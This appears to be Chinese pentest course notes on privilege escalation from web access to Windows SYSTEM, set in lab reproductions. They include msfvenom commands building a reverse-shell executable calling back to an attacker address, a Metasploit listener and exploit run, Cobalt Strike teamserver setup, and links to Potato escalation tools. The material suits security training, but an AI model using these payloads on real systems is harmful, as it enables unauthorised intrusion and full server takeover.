Window Linux 權限提升

#基礎點：

0、為什么我們要學習權限提升轉移技術：

簡單來說就是達到目的過程中需要用到它? 心里要想著我是誰我在哪我要去哪里

1、具體有哪些權限需要我們了解掌握的：

后臺權限，數據庫權限，Web權限，用戶權限，服務器權限，宿主機權限，域控制器權限

2、以上常見權限獲取方法簡要歸類說明：

后臺權限：SQL注入，數據庫泄漏，弱口令攻擊，未授權訪問等造成

數據庫權限：SQL注入，數據庫泄漏，弱口令攻擊，未授權訪問等造成

Web權限：RCE,反序列化,文件上傳等直達或通過后臺數據庫間接造成

用戶權限：弱口令,數據泄漏等直達或通過Web，服務器及域控轉移造成

服務器權限：系統內核漏洞,釣魚后門攻擊,主機軟件安全直達或上述權限提升造成

宿主機權限：Docker不安全配置或漏洞權限提升直達（服務資產造成入口后提升）

域控制器權限：內網域計算機用戶提升或自身內核漏洞，后門攻擊，主機軟件安全直達

3、以上常見權限獲取后能操作的具體事情：

后臺權限：文章管理，站點管理，模版管理，數據管理，上傳管理等

數據庫權限：操作數據庫的權限，數據增刪改查等（以數據庫用戶為主）

Web權限：源碼查看，源碼文件增刪改查，磁盤文件文件夾查看(以權限配置為主)

用戶權限：就如同自己電腦上普通用戶能操作的情況（敏感操作會被禁止）

服務器權限：就如同自己電腦上能操作的情況（整個系統都是你的）

宿主機權限：就如同自己電腦上能操作的情況（整個系統都是你的）

域控制器權限：就如同自己電腦上能操作的情況（整個內網域系統都是你的）

4、以上常見權限在實戰中的應用場景介紹：

當我們通過弱口令進入到應用后臺管理

當我們下載備份文件獲取到數據庫信息

當我們通過漏洞拿到資產系統的Web權限

當我們在公司被給予賬號密碼登錄計算機或系統

當我們在公司或釣魚后門獲取到某個公司機器系統

#權限提升-Web應用&中間件&數據庫

背景1：通過弱口令進入Web后臺系統通過上傳獲取Web權限

背景2：通過Tomcat弱口令進入控制界面通過上傳獲取Web權限

背景3：通過Redis未授權進入管理端通過SQL執行獲取Web權限

#權限轉移-后臺管理&數據庫管理&Web

Tmall-后臺權限->Web權限（提升）

Tmall-Web權限->數據庫權限（轉移）

Tmall-Web權限->另一個后臺權限（轉移）

PhpMyadmin-數據管理->Web權限（提升）

PhpMyadmin-Web權限->另一個后臺權限（轉移）

#Web到Win系統提權-平臺&語言&用戶

1、Web搭建平臺差異

集成軟件，自行搭建，虛擬化等

集成軟件：寶塔，PhpStudy，XAMMP等

自行搭建：自己一個個下載安裝搭建配置

虛擬化：Docker，ESXi，QEMU，Hyper-V等

集成軟件大多獲得權限后直接就是高權限除了寶塔有自己的安全策略

自行搭建的不會出先拿到權限后就是高權限的情況

虛擬化需要先逃逸

2、Web語言權限差異

ASP/ASP.NET/PHP/JSP等

權限高低：JSP>ASP.NET>ASP=PHP

JSP的拿到權限后就是高權限不需要再提權? 其他語言都需要再提(前提是自行搭建的如果是集成軟件的都不需要再提權了)

原因：語言特性

3、系統用戶權限差異

Windows：

System：系統組，擁有管理系統資源的權限，包括文件、目錄和注冊表等。

Administrators：管理員組，具有對計算機進行完全訪問和操作的權限。

Users：用戶組，一般用戶的默認組別，擁有較低的系統權限。

Guests：

訪客組，可以訪問計算機上的公共文件夾和打印機，但不能更改配置和安裝程序。

Backup Operators：

備份操作員組，允許用戶備份和還原數據，但不能更改配置安裝程序。

Power Users：高級用戶組，擁有比一般用戶更高的系統權限，但比管理員組權限低。

Remote Desktop Users：遠程桌面用戶組，允許用戶進行遠程桌面連接。

Network Configuration Operators：網絡配置操作員組，允許用戶管理網絡配置。

Performance Log Users：性能日志用戶組，允許用戶收集性能日志和計數器數據。

Distributed COM Users：

分布式 COM 用戶組，允許用戶使用分布式 COM 連接到計算機。

IIS_IUSRS: 用于授權IIS相關服務的用戶組。

Windows 權限大概分為四個基本

System是最高權限Administrators其次，再下面就是User，組權限最底的是特殊組如Remote Desktop Users 這種，ASP/ASP.NET/PHP獲得的權限就是IIS_IUSRS這個組的。?

Linux：

系統用戶：UID(0-999)

普通用戶：UID(1000-*)

root用戶：UID為0，擁有系統的完全控制權限

#Web到Win-系統提權-寶塔面板-哥斯拉

Windows 2012(寶塔Apache+PHP)-MSF

復現搭建：選擇2012系統后自行安裝寶塔

PMeterpreter

BypassOpenBaseDir

BypassDisableFunction

#Web到Win-系統提權-溢出漏洞-MSF&CS

Windows 2008(IIS+ASP)-MSF

自行搭建+ASP/PHP+Windows 2008

復現搭建：選擇2016系統后自行安裝IIS+ASP

0、MSF安裝：（也可以用kali）

目前的msf版本有bug可以TB上購買pro版本嘎嘎穩

https://blog.csdn.net/qq_46717339/article/details/122653084

1、生成反彈后門

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.139.141 LPORT=3333 -f exe -o msf.exe

2、配置監聽會話

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 0.0.0.0

set lport 3333

exploit

2.1、篩選EXP模塊

全自動：快速識別系統中可能被利用的漏洞

use post/multi/recon/local_exploit_suggester

set showdescription true

3、利用EXP溢出提權

background

use exploit/windows/local/ms16_075_reflection_juicy

set session 1

exploit

Windows 2016(IIS+ASP.NET)-CS

復現搭建：選擇2016系統后自行安裝IIS+ASP.NET

0、CS安裝

chmod +x ./teamserver

chmod +x ./TeamServerImage

./teamserver IP password

1、連接CS

2、創建監聽器

3、加載腳本插件

#Web到Win-系統提權-人工操作

如果提權中無法執行命令的話，可以嘗試上傳cmd.exe到可讀寫目錄再調用

優點：解決實時更新不集成的EXP

缺點：操作繁瑣，需要各種復現調試

解決工具或插件無法實時更新，又或者集成較少面對復雜情況下人工操作更適合

1、信息收集

參考常見命令（見上圖）

2、補丁篩選

https://i.hacking8.com/tiquan

https://github.com/bitsadmin/wesng

python wes.py systeminfo.txt --color

python wes.py systeminfo.txt --color -i "Elevation of Privilege"

3、EXP獲取執行

KernelHub 針對常用溢出編號指定找EXP

Poc-in-Github 針對年份及編號指定找EXP

exploitdb 針對類型及關鍵說明指定找EXP

https://github.com/Ascotbe/Kernelhub

https://github.com/nomi-sec/PoC-in-GitHub

https://gitlab.com/exploit-database/exploitdb

#Web到Win-系統提權-土豆家族

https://mp.weixin.qq.com/s/OW4ybuqtErh_ovkTWLSr8w

土豆(potato)提權通常用在我們獲取WEB/數據庫權限的時候，

可以將低權限的服務用戶提升為“NT AUTHORITY\SYSTEM”特權。

1、Test in：Windows 10/11（1809/21H2）

2、Test in：Windows Server 2019 Datacenter(1809)

3、Test in：Windows Server 2022 Datacenter(21H2)

土豆家族

SweetPotato OK

RoguePotato

BadPotato OK

EfsPotato OK

GodPotato OK

PetitPotato OK

MultiPotato

CandyPotato

RasmanPotato OK

CoercedPotato

JuicyPotatoNG

PrintNotifyPotato OK

GodPotato

https://github.com/BeichenDream/GodPotato

SweetPotato

https://github.com/CCob/SweetPotato

RoguePotato

https://github.com/antonioCoco/RoguePotato

BadPotato

https://github.com/BeichenDream/BadPotato

EfsPotato

https://github.com/zcgonvh/EfsPotato

MultiPotato

https://github.com/S3cur3Th1sSh1t/MultiPotato

CandyPotato

https://github.com/klezVirus/CandyPotato

RasmanPotato

https://github.com/crisprss/RasmanPotato

PetitPotato

https://github.com/wh0amitz/PetitPotato

JuicyPotatoNG

https://github.com/antonioCoco/JuicyPotatoNG

PrintNotifyPotato

https://github.com/BeichenDream/PrintNotifyPotato

CoercedPotato

https://github.com/Prepouce/CoercedPotato

本文來自互聯網用戶投稿，該文觀點僅代表作者本人，不代表本站立場。本站僅提供信息存儲空間服務，不擁有所有權，不承擔相關法律責任。
如若轉載，請注明出處：http://www.pswp.cn/diannao/14127.shtml
繁體地址，請注明出處：http://hk.pswp.cn/diannao/14127.shtml
英文地址，請注明出處：http://en.pswp.cn/diannao/14127.shtml

如若內容造成侵權/違法違規/事實不符，請聯系多彩編程網進行投訴反饋email:809451989@qq.com，一經查實，立即刪除！